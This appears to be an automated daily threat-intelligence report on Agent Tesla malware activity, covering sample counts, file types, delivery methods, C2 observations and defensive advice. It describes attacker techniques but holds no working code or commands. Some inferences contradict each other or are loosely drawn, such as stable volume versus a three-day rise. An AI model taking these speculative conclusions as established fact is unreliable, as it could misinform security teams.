Daily Summary
Agent Tesla activity surged to 74 new samples on 2026-04-30, a 26% increase over the 7-day average of 59. This marks a notable escalation after several days of stable volume and suggests a renewed distribution push.
New Samples Detected
PowerShell scripts (.ps1) dominate today’s submissions at 35 samples, accounting for nearly half of all new files. Executables (.exe) follow with 15, JavaScript (.js) with 11, and small counts of .bat, .dll, .vbs, .rar, .cmd, .tar, and .hta files. The heavy reliance on script-based loaders over compiled binaries is consistent with recent trends, as actors favor living-off-the-land techniques to bypass static analysis. No new archive or disk image formats appeared, indicating familiar packaging patterns.
Distribution Methods
The script-heavy file mix points to phishing-driven delivery. PowerShell and JavaScript loaders are commonly embedded in email attachments or hosted on compromised sites using social engineering lures. The presence of .hta and .vbs files reinforces this assessment, as these are classic vectors for drive-by downloads or macro-enabled document payloads. No bulk campaign infrastructure changes were detected, suggesting continued tested delivery chains.
Detection Rate
Detection coverage for this batch remains effective but not universal. While major engines flag most of these samples on submission, the reliance on obfuscated PowerShell scripts gives attackers a window of opportunity before signatures are updated. The 74 new IOCs indicate that a portion of these variants may have evaded initial scanning. SOC teams should prioritize behavioral monitoring of PowerShell execution rather than relying solely on file reputation.
C2 Infrastructure
No new C2 servers were observed today, which is unusual for such a volume spike. The lack of fresh infrastructure suggests reused domains or IPs from previous campaigns, possibly with rotated credentials or hosting behind hidden services. Geographic patterns remain unchanged with no concentrated hosting regions identified.
7-Day Trend
Today’s 26% surge above the weekly average breaks a period of moderate activity where daily counts hovered near 55-65 samples. The sustained rise over the past three days signals a fresh campaign wave that may continue into early May.
Security Analysis
A notable shift is the complete absence of new C2 domains despite the sample surge. This indicates attackers are likely reusing old infrastructure or utilizing domain generation algorithms that were previously observed. A secondary possibility is a pivot to decentralized C2 via legitimate services like Telegram or Discord. Defensive teams should monitor outbound connections to known Agent Tesla indicator lists and block script execution from untrusted sources in user paths. Recommendation: Enable constrained PowerShell language mode on endpoints and deploy AMSI bypass logging for script execution.